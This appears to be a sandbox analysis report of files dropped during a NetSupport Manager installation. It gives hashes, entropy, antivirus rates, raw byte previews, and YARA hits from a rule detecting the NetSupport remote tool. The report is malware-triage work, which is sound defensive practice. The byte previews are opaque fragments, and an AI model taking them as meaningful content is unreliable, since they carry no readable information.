                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):186336
                                                                                                                    Entropy (8bit):7.03311119010921
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:ClXC3/npbt1b5Ooum6yWCmNc4OYZ/Y+ZhJbe8Djbeij6:aXC35t1UOi7Os3le8LeZ
                                                                                                                    MD5:3B6E06D0861D2D553111BBCB1783BCAD
                                                                                                                    SHA1:18B3AA65FCC2C4E067A3DC097E833BA5CC82EB40
                                                                                                                    SHA-256:5B4A2536FCC852D811A351BEF1583F7D5DB516D66474F86EB3766D7EA7AE4749
                                                                                                                    SHA-512:D80D2F7212A30DA7B625DAEADD64B07543059DDC1E016D650AB3E50A16C8F4BE4194F178D8CED65F6C4857A74C10DA6501E1958A94BEF0AE4529F6134ABBDD03
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m...)...)...)...F.y.;... .t.,...)...}...F.L.7...F.M.G...F.|.(...F.}.(...F.z.(...Rich)...................PE..L.....oe...........!.................................................................)....@..........................@..M...D9..<.......4............z...]......H...................................@3..@...............X............................text...0........................... ..`.rdata..=f.......h..................@..@.data....k...P...,...0..............@....rsrc...4............\..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\DBI.EXE

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):89568
                                                                                                                    Entropy (8bit):6.7180392406274745
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:l1rRVUJVO9WjSe8wkrau39b35akGnHf3nVv5Hjwi9RGeSee/OjHAee/+jHri:7w8r76fZ5Hjwi9R3Se3jgeXje
                                                                                                                    MD5:5720EBD42711018DA15E56216B4B9E11
                                                                                                                    SHA1:DEC04A1C9CAC50CC2EDEABC8B628EFA615A65D45
                                                                                                                    SHA-256:4F757A99F8DBB4BC31187140AD048F149CA61A1127923E6F08F6E77EDA8E97F8
                                                                                                                    SHA-512:D4FB17B218CB82AED5601578F94DF35D3C1A1690D402FCA978281CF6649CCF69C4487F151BE4C0ED2DB2EED716761B5B6CE27393B1A3F5ADAB28F99FA906A72A
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........r.W...W...W...8...F...^...P...W.......8...6...8...r...8...V...8...V...RichW...........PE..L.....oe.....................\.......7............@..........................`............@.................................l...P....0...................]...@......................................P...@...............<............................text...N........................... ..`.rdata...0.......2..................@..@.data....0..........................@....rsrc........0......................@..@.reloc..v....@......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):117728
                                                                                                                    Entropy (8bit):6.195705433401619
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:ONMIm6T+oOVZ5gJhPci0sWjcdpqD+MilESrH8q5Ree/BjHWee/TjHw:ONXm6FAOV7pqD+DESrH8q5Regj2eGjQ
                                                                                                                    MD5:F574F3A16C358D73C5F8A17606E75EBF
                                                                                                                    SHA1:00D6002C8B2C4C6D9F8BEF02E169777E4B517CF5
                                                                                                                    SHA-256:7EC3DA30E73122F5B050D503CB2214537E90016EEC059F852230B4F1B87E1B08
                                                                                                                    SHA-512:1D1664DBAA8E4F086523D9D63B69E15BFF7B8C9CF047C1C964E40DA308957355F6CED2F19D0D57B3D4EE72250E653DA75196F804230C4CCC146ADB0984FEA035
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........r.............%......%......%..............(........(......)......).............).....Rich............PE..L.....oe...........!.................A...................................................@..........................-......,%..x....`..`............n...]...p..........8...............................@...............X............................text...[........................... ..`.rdata...m.......n..................@..@.data....-...0......................@....rsrc...`....`.......*..............@..@.reloc..B;...p...<...2..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLL

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):616928
                                                                                                                    Entropy (8bit):6.723244642108574
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:cVqKnPyKX/gu8Vk3AZkUBEX9gGXiaxHwTcpqPqlu20n9h0hds0/qnrY9vkoBLEla:/cyysqFUY9vkCEswvUKZjI/8ZEjv3Lt
                                                                                                                    MD5:C666FD00B08757335E2F30CA0D6F63C2
                                                                                                                    SHA1:996891107C4F32A0062C6FA8C1741A8CD5C659EF
                                                                                                                    SHA-256:F61ACF95B9B9CBA2AAC856783CF1F2F486548F96CF21118161E40A08C9101E58
                                                                                                                    SHA-512:33B8D6893C4E370782AA922E1437BF1502D127059F86CA30DAEA3145B99B3459B7D6A1C3471608867CE91D873C1F0B376B550E5AC57BCB36732154C65124E2BA
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0...0...0...~...0...F...0...0...1...H...0...F!..0...F .B0...F...0...F...0...F...0..Rich.0..........PE..L...y.oe...........!.....l..........]...............................................K)....@..................................z.......0..8................]...@...T.. ...............................`B..@....................s..`....................text....k.......l.................. ..`.rdata...............p..............@..@.data...........*..................@....rsrc...8....0......................@..@.reloc...U...@...V..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):240096
                                                                                                                    Entropy (8bit):6.812972915579879
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:AZq8EqxQhS2QfOayU+cO30JHR8jZ4JmBPgyxOJoFiAyFUkplRAYeYjmeejj/:ZaxsmOTWujygwAyFUG1eleg/
                                                                                                                    MD5:EE02606C9E853533E2FF414E4640571B
                                                                                                                    SHA1:19C847251AADF8BA5A39CC090EEF8E6D7534C423
                                                                                                                    SHA-256:8545B1AF2255629A4EEA1B43E3D1794CDB9ED2E51B576F09E1C0C18023B7BCF3
                                                                                                                    SHA-512:984198538D4FD358E3910F2FA8D0BD6EE6D9488719B456D62D604B6B173F61B6201DFF94DE3722890A99CCADA30F95F009C433010381FB823FB2B16792EF157A
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0.M-t.#~t.#~t.#~...~g.#~...~(.#~}..~v.#~}..~y.#~t."~..#~...~Z.#~...~u.#~...~u.#~...~u.#~Richt.#~................PE..L...b.oe...........!.....R...................p....Xb................................<.....@..........................................P..(............L...]...p...%..`s..................................@............p...............................text....Q.......R.................. ..`.rdata..v....p.......V..............@..@.data....:..........................@....rsrc...(....P......................@..@.reloc...&...p...(...$..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\123716_HF_U1.bin

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):131
                                                                                                                    Entropy (8bit):5.227632116710512
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:zLTOM1Mrses+HVLrxoezM/nKrBFXcPKjcIWgxyGKLWskV:nTj1MrRscLlfg/K8PrJgxgeV
                                                                                                                    MD5:CE9AAC34D7FF9DBF6696BDB337285362
                                                                                                                    SHA1:F70BE3A3B0B7292EC7756E6E8705020019CADD79
                                                                                                                    SHA-256:081A72C5833E4392D02FF444E669770F1673996162844C5243050E44E02742A8
                                                                                                                    SHA-512:8904457CD1882C25B9CD98D7F5DE6CE4C0E40A3B3BB33DFF4E8E1D5011DF0E38AE937620F421C508170E72726109107F0572DE2FFCFD7F5C00AA6F983E3333F2
                                                                                                                    Malicious:false
                                                                                                                    Preview:...InventoryTime\UTCTime\0......CHardwareObject.1732325920.InventoryTime\Time\0...22 Nov 2024 20:38:40.ET\HotFixes...0.ET\Icons...0

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\amberbar.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 1 x 20
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):831
                                                                                                                    Entropy (8bit):0.983335608654777
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:CBI/xi8M9C1Awcr02mxhl/E0ltrllwklE:wMc9CKwa0Rl/1lqklE
                                                                                                                    MD5:A2D88CFF615C867DD12ED7F2A0F4B307
                                                                                                                    SHA1:0BF04BDF015CF392AC7322200287482CA5BB4DE1
                                                                                                                    SHA-256:470801C93670F95D15D29D962E7903650F42B55EFF38DEBEDF76AF66E55D18F3
                                                                                                                    SHA-512:653B07F4D80D90E9730F6B1E405BEE77843A9FE2F9812B98642599CD441ACA3296FD2B6C8A25EBD68D4F981694E4AFDA6A4E7596091ED92496BFBA451E2CFA7A
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a........{.........!..!.!.!.!........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,...............H.`...;

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\bar.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 10 x 20
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):847
                                                                                                                    Entropy (8bit):1.3936912447177485
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:CiIF3VdYF2tvfnug2A+HJaR85r02mxhl/E0ltrllIWzv12b/bVfe:zw4yGg2p0Rl/1lmy19
                                                                                                                    MD5:55E6FD2D853C73F3521420BF2A969DA7
                                                                                                                    SHA1:A45054111BF65155C586843B4CD40EA74E54C105
                                                                                                                    SHA-256:9513298F36610F67CF7D68559A2511B4CA35F93B84A648809C3EE381E2A3FCEA
                                                                                                                    SHA-512:C8B8BE6579566ADEB4096FC82057064E17DD3815059148D617C5B83A80B174A7C7849DF4ECCAA0C345B3193B9EDF5AFE7D9E748E8864C5FE142FEBA989BD4566
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a.......hhhpppxxx.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,...............H......*\....#J..0 .;

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\baseboard.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 256 x 256
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):3600
                                                                                                                    Entropy (8bit):7.868516763778815
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:h+b+Hb7fTL37CCWf71dHoBbNVBqEjXOTbrPw6ASzi8y04dBrNNHbahN:h3f33uVf/HoBpVoErOvU6ry0ATN7AN
                                                                                                                    MD5:93997B1706AD63178B10429687E9B567
                                                                                                                    SHA1:A2D56AA4BDF21995E5B298E3B12DD76681617292
                                                                                                                    SHA-256:55C31D2A6EB40EB606AB3C0E65F98CC010AE9B8803E4553D8DB273944C8C0423
                                                                                                                    SHA-512:BCC3BD3D94FB50034EEC3D74C1F3AF1524CA485C4373DF7945A1CF259D03854F4EBE953D7BB70F4FB77A0924183853E4EEF807DC265172B06A32A680AF63A302
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a..........888...t(...==<<<;;;:eedddcccbbba``___^]]\\\[......................................................edcdcba`_kjiihghgfgfe...........................<;;kjjjiidcccbbbaaa``_^^^]]]\\[ZZ................................................................................................................eee[[[JJJIIIGGGFFFEEEDDDCCC===<<<;;;:::999.............................................!.....q.,............q............................................................................................................pbB.........[H........n..~..*\...5Z.$tH..E|a$*...Grp........G";..B8k.h46...8s.....@...J....(...f&..F.J.J..U..f........K.lY..J(}....f...K.'........m.......C..._...:....89..*..."..B.....4..S..30.S.......S..B.........E6/....).D.qn....y....0P0.[\.*..7...6..6.........U_.Q=....m.OO.s..k........>...'....T.'...6(....@..P..._..C...v.!..~(.!..a.&v..X..`.7opa..v.b.$....7..c.+..AR....4.....&29.."By..ca.../zs..H.2_cR......d.He.*0...N.(...Y&.d.c8i....fe.@.

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\broken.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 16 x 16
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):938
                                                                                                                    Entropy (8bit):2.8573986253171575
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:NzpsyX87KPbQBfO2/6jpywkVtiAoKgHQHt1Z39rvpmE:bev16VcH9gwNbhpmE
                                                                                                                    MD5:B373B4BDEE4E220D7515FBB293FB7224
                                                                                                                    SHA1:0C316664C0151093ED2A76C4C6285BA0835DDE74
                                                                                                                    SHA-256:59F6F5B3C98AFE90D4916C626D6459984AF3649B9F63F7BCE0925EAA49FBB1C2
                                                                                                                    SHA-512:CAAB966B209B9CD0D8818F9F91A99D3D2574EBD8F795B6E06EDA08AF3F2662DAB0DC319DC62656FE098557244037D148BE6C56FF1A88D08358BE90DC19744C15
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a........L3.M4.P7.R:.U=.X@.ZC._I.`J.iU.o[.q^.vc.xe.|j.q.u.z.|......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,...............X!....0.\.......*\. .E...b.xQ.@..H.xX.....m|H.e..-!jP.q@.$.@d` ..:!".........y.a.........D.9..t.`.@..#V..!.C..5..8`,.....@.`...;

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\btn_down.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 14 x 13
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):891
                                                                                                                    Entropy (8bit):1.8494573303221005
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:mu8sPdPXrJ+l3Ozvn/lvW88B1lWqv/L9lUo/E:71/r4qFvWzd9E
                                                                                                                    MD5:220F33361D1D587C5899444C7B6C57CF
                                                                                                                    SHA1:53E9498570FA8DFFE491F4854104254EE395F9E7
                                                                                                                    SHA-256:163082A6F3992DC25B4B8848D2DB66A9E27CE7E6535B5F277DF119506CD1E4EA
                                                                                                                    SHA-512:FA336DB5835DA1FB5D943CBC40EEB8890B07BB14E5A2BB330F606500168C53661AC942C9148C1AB7EA6E656804D5E9F9C6832A4117DD1BFC165EEF502554D092
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a....................5.@S@QbQQcQYjYcsc{.{K.KL.L.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,..........X.'..H. .............6@ .....F..a.....$P@P.......P.A..........U.Xp.....}...@@.....@.4 .;

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\btn_down_grey.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 14 x 13
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):827
                                                                                                                    Entropy (8bit):1.2654828024465707
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:CABkulKFUFPtb9h4H9ee0XLylEJ+llt9YRka2b/rG:mu8sPdPXrJ+l3iRkaJ
                                                                                                                    MD5:6D7B88F8F540000104F86637B7A31E5B
                                                                                                                    SHA1:BB4D3765DA73CAF1B7CC2843EAE1106B3E67963F
                                                                                                                    SHA-256:104D7AD8EAFF36E019A84C3B18D1B37591D06D9C9841FF5B82310A800556EEC9
                                                                                                                    SHA-512:FBFA45CD58F55C0E745539014FCE0DDCDD913DA38F1AE5BAD7C2147FEF64E1DD585BB6411EC981D08AAA147B64BB6A93D2287A20719946CEBF4CDBB36695B269
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a....................5.@S@QbQQcQYjYcsc{.{K.KL.L.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,............'..H......*\....#J\...;

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\btn_up.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 14 x 13
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):891
                                                                                                                    Entropy (8bit):1.8451090876153475
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:CABkulKFUFPtb9h4H9ee0XLylEJ+llt9AzVFkmipnBIsRvssqy89sR1lfcTFEn:mu8sPdPXrJ+l3Ozvk2Ass0eR12K
                                                                                                                    MD5:78D2B10A120613047C691C679F165799
                                                                                                                    SHA1:6D3998780D06860C1589DFB2C0E826EFD86E05F3
                                                                                                                    SHA-256:CDA873D713E82B0E32020B393B3166A7E2E05DCEB7F8D269B4C64771888446BF
                                                                                                                    SHA-512:47EA9D750F7A5B1E22D92A35D870256BFC8045FCFC7D2B87E0E089820A6BBD71FF81F15F4877DDF3DD32C047747DD34DA47698441CAC82E62873876001378B9E
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a....................5.@S@QbQQcQYjYcsc{.{K.KL.L.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,..........X.'..H.`A......@@....(P......, ..b....8(.pd...J.x..F..)..)q ...f2.0..@..t.l.@ ..H...h0 .;

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\btn_up_grey.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 14 x 13
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):827
                                                                                                                    Entropy (8bit):1.2654828024465707
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:CABkulKFUFPtb9h4H9ee0XLylEJ+llt9YRka2b/rG:mu8sPdPXrJ+l3iRkaJ
                                                                                                                    MD5:6D7B88F8F540000104F86637B7A31E5B
                                                                                                                    SHA1:BB4D3765DA73CAF1B7CC2843EAE1106B3E67963F
                                                                                                                    SHA-256:104D7AD8EAFF36E019A84C3B18D1B37591D06D9C9841FF5B82310A800556EEC9
                                                                                                                    SHA-512:FBFA45CD58F55C0E745539014FCE0DDCDD913DA38F1AE5BAD7C2147FEF64E1DD585BB6411EC981D08AAA147B64BB6A93D2287A20719946CEBF4CDBB36695B269
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a....................5.@S@QbQQcQYjYcsc{.{K.KL.L.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,............'..H......*\....#J\...;

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\computer2.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 256 x 256
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2574
                                                                                                                    Entropy (8bit):7.7150160845623175
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:bq5K+FBR57fTL377fTClBHG+6OnPMddPp6pZRIqSCrOV8snZAOgadLO+:bqLFFf33PfuPi8uvCrOGsGN4Ld
                                                                                                                    MD5:AA5557A8EA8F8AF1B223501E4CB02E4D
                                                                                                                    SHA1:39E7292B18779468700245B526364B06C8AF09C9
                                                                                                                    SHA-256:E1427F55EDB661FF70EB297F887410F73109BB6CF25592E0AC548C5F4D1B7AD8
                                                                                                                    SHA-512:24CF5B8525065AF3F07F8A82ED189383E7AFD7D9F2F8E74C3B45CC4ED504ECD751FFE5DE15C28A2715172DAC38AF4D5B1E3E41E55CFE20019C830AB2CB3A69DA
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a..........888".................$..%..&..'..*..,..>..?..@..A..B..C..C..D..E..F..G..H..U..U..V..g..x.........................................?..U..f..f..y..{...........................................................mmmkkkiiigggeeeaaa```.............................................................................................................................................!.....Q.,............Q.................................................................................................................................H...z.O.\.a....J.HQ..R.3j$x... .u...d..L..2.>.0c.I...8s..)..;...JTgO....]...H7)uJ..P.Q3M..+M.Y/m.J.+...]..,.Ij...z..{s......|..+.o^...+.l.pa{..+..1B.i.G&J.....0g............k.].......L....3s'Nm..o....6~.w...r..mt.W/{.{...v..>.Y....7_u....g..>.....g._..........# ".&...).`c.N....E....ZH.|.15.q.vX...("].j..r'.E"m&.....(cN4.f.7..<..@.%.`..... E.u._I.."i->.W.K6I....y..P@..M0...I q..E.....y.......^X...w..&|...

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\cpu2.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 128 x 128
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6416
                                                                                                                    Entropy (8bit):7.672789387563995
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:dof5Gc5nRjOhtX21I1cv8jecTgaTobE0Gqe+3DWcgEB5qD5nXLuIi4UvUCF8UyIt:c5/RKX2vvQW9G4DFgEjWUBZLMA
                                                                                                                    MD5:9C66D6A559E99539BE51D8B506937B03
                                                                                                                    SHA1:8B6CFBFD26E68832DBF190BCBA6ABAD7696D5B54
                                                                                                                    SHA-256:EC9C5DD2A41455755758BE16EE3B0FBC1173EE953F1B49D820FD68AC5B7FA9CC
                                                                                                                    SHA-512:769D72D56A0F2B580391440CF1E1808523D2286E9659005A7D4120C655EB504BD773F6DC223A3A9782D1B82779BA901AFEADF59701D5C8EAC61EFB89B51F07C7
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a...................uy............UUU999.................}}}...>>>......555.........111............%%%...NNN.........))).....kkk...{..fffPPPhhh...---...lllbbb...^^^pppRRR!!!...XXXZZZFFFnnn......LLLxxx...\\\ttu.........vvvhmt```BBBHHH...DDD...kr|zzz...V]c........@@@.................dddJJJ....svz......rrr...dfi.......PSV......UVY.....ijm.........^dl.............y{~...Y[]......=AE.........,,+...777.........RST.........OOO...0..234........................WWWbcfklnqsuEEE444MMMttwaaaKIIvwz......hhg.........333LMN]]]nnm___JJL...YYY......BCDqtxTTUBAAEDCcccFFE...iiimnpffdqqqIKK......AFK8;>;;;.........HHG...346.......................cin...+--???mmmoooiijijkjjiQRSQQQ...]]_]^`[\_qqpQX^\\[[[[KMOKKKbaaLLKddgcddeee^^]......bbasssrrqA@?opsGGGTTTSSSyy{CCCAAAgggHIK...!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`+0....N.........2.8.Q@...".e..._#...K.a..\...adH.....h....y<.A.`.O.Y..:.....F.4.P....b.

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\disk2.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 256 x 256
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6520
                                                                                                                    Entropy (8bit):7.841992508206522
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:LjnnfoGCriNQaG34T46tblxNC53jX3gp6JE:/nfok3Uo46tp653b3G6JE
                                                                                                                    MD5:F9F426CA807A7EEE268EEDAD685998A7
                                                                                                                    SHA1:777892BBA52A7914F5AC030A215FE536F1D850FF
                                                                                                                    SHA-256:DCEAC6EB086C02875C1F2A6221750A6B9E7C10E42D498106F4AE72AABE639321
                                                                                                                    SHA-512:C129EAB92CEDEF05FA1A772F0C8C93E5EDB01BCEF77A844F22EE648FDC79EE631A0687DC837FD07A8B75364339C0F38DE1DCA3DFBD1FD4E7E8382C5E473B6B0C
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a................t(888TTSPPOOONNNMJJIDDCBBA@@?llkiihhhg\\[[[ZZZYVVU....................}........................................................................fededc`_^YXWVUT.~}}|{{zyzyxyxwpononmlkjkji...............................................~..............................................................................?>>=<<TSSPOOLKKHGGDCCCBBjiidcc_^^YXXXWW..........................................................................................................................................................................................|||zzzyyyvvvtttssspppnnnmmmjjjfffeeebbb```]]]\\\YYYVVVUUUTTTSSSPPPMMMLLLKKKHHHGGGFFFDDD@@@;;;999..............................................................................................................................!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@..t$...H.*].4.P.J.J...X.j..j.`..;2.O.y.......p..K...J..1..ZG...K....^..e..PP>..+......['/>e..h..b.Mzt..&.=r.r..

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\greenbar.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 1 x 20
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):831
                                                                                                                    Entropy (8bit):0.972559746338926
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:CBI/VXVm/XFkMr02mxhl/E0ltrllQ6E:woXVm/B0Rl/1l1E
                                                                                                                    MD5:BA6A6D3669870D2DB7EDC67BBF3FF236
                                                                                                                    SHA1:3B3D0AB6731C4A146DD10BED4D06FC260657F059
                                                                                                                    SHA-256:A59009593867C1E9F6866A0BBD1E81B9D525A1844D0E2E8FC89DC92411DB00FA
                                                                                                                    SHA-512:A76BC5E20A7C71C64F398503BC34BE777115593DA56089D29F09FB1F5BA8A7FB22B5E190BBD56237DABC1F02838F3A5E7D322162C3A4800D255B541FE4CF5867
                                                                                                                    Malicious:false
                                                                                                                    Preview:GIF89a.......p.pp.pp.pp.pp.pp.pp.pp.pp.p.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,...............H.`...;

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\header.gif

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:GIF image data, version 89a, 108 x 85
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):7876
                                                                                                                    Entropy (8bit):7.513291372804623
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:lY8I2A27bUw0r7Ro7cFjYLNT0vvqFZsI+8YrYn1XsjJmIXb:y8SobXORac+T0GZst8YrYn18ZL
                                                                                                                    MD5:1778BE96CF115F3207F976CC1064612B
                                                                                                                    SHA1:CFAC3B903F0E11E3263582EB3B1BFB4E6432CDE7
                                                                                                                    SHA-256:204A91AF35DD6F6CBAA6FC84D4AF48F78D3A56945526DEC0A27B4BCA6C1C4738
                                                                                                                    SHA-512:659AD463254D3522941744500670C527280A5173B25487BED82413885A9C67B2EB79C95897D256DA73D2C9D93D8FE7AD53DBF412D1E7BFAC7C223DEB37291A8D
                                                                                                                    Malicious:false
